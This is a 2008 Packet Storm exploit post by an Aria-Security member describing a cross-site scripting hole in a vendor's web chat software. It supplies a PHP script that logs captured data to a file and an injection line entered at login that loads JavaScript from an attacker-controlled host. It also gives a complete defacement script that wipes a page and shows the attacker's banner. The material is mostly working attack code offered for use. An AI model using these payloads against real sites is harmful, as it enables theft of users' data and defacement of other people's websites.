wdcs-xss.txt

2008-02-11T00:00:00
ID PACKETSTORM:63477
Type packetstorm
Reporter The-0utl4w
Modified 2008-02-11T00:00:00

Description

                                        
                                            `Aria-Security Team (Persian Security Network)  
httP://Aria-Security.Net  
---------------------------------------------  
Shoutz: Aura, imm0rtal, Soot.Hackers, iM4N,   
A Special Thanks to my dear friend Mh_p0rtal for his great help in order to find this vuln.  
Vendor: http://www.softwebsnepal.com  
Demo: http://www.softwebsnepal.com/website_design_chat_software.htm  
Original Advisory: http://forum.aria-security.net/showthread.php?t=517  
  
First we need a little php file in order to get and save our needed information + A txt file to save them there and chmod must be 777 in order to work  
[code]  
<?php  
if ( $_GET['text'] ) {  
$text = $_GET['text'];  
$filename = "Aria-Security.txt";  
$fp = fopen( $filename, "w" ) or die("Couldn't open $filename");  
fwrite( $fp, "$text" );  
fclose( $fp );  
}  
//--------------  
$filename = "test.txt";  
$fp = fopen( $filename, "r" ) or die("Couldn't open $filename");  
while ( ! feof( $fp ) )  
{  
$line = fgets( $fp, 1024 );  
print "$line<br>";  
}  
fclose($fp);  
?>  
[/code]  
  
login as:  
<script src=http://Yourwebsite.com/yourfile.js></script>  
(For Script Visit original link)  
  
  
NOT RECOMENDED: Byt you can also just upload a "deface page", something like:  
  
  
[code]  
var title = "Aria-Security.Net";  
var bgcolor = "#HEX";  
var image_url = "http://ariahosting.ir/index.html";  
var text = "The-0utl4w";  
var font_color = "#HEX";  
  
deface(title, bgcolor, image_url, text, font_color);  
  
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {  
document.title = pageTitle;  
document.body.innerHTML = '';  
document.bgColor = bgColor;  
var overLay = document.createElement("div");  
overLay.style.textAlign = 'center';  
document.body.appendChild(overLay);  
var txt = document.createElement("p");  
txt.style.font = 'normal normal bold 36px Verdana';  
txt.style.color = fontColor;  
txt.innerHTML = pageText;  
overLay.appendChild(txt);  
  
if (image_url != "") {  
var newImg = document.createElement("img");  
newImg.setAttribute("border", '0');  
newImg.setAttribute("src", imageUrl);  
overLay.appendChild(newImg);  
}  
  
var footer = document.createElement("p");  
footer.style.font = 'italic normal normal 12px Arial';  
footer.style.color = '#DDDDDD';  
footer.innerHTML = title;  
overLay.appendChild(footer);  
}  
[/code]  
  
Regards,  
The-0utl4w   
Credits Goes to Aria-Security Team  
http://Aria-Security.Net  
`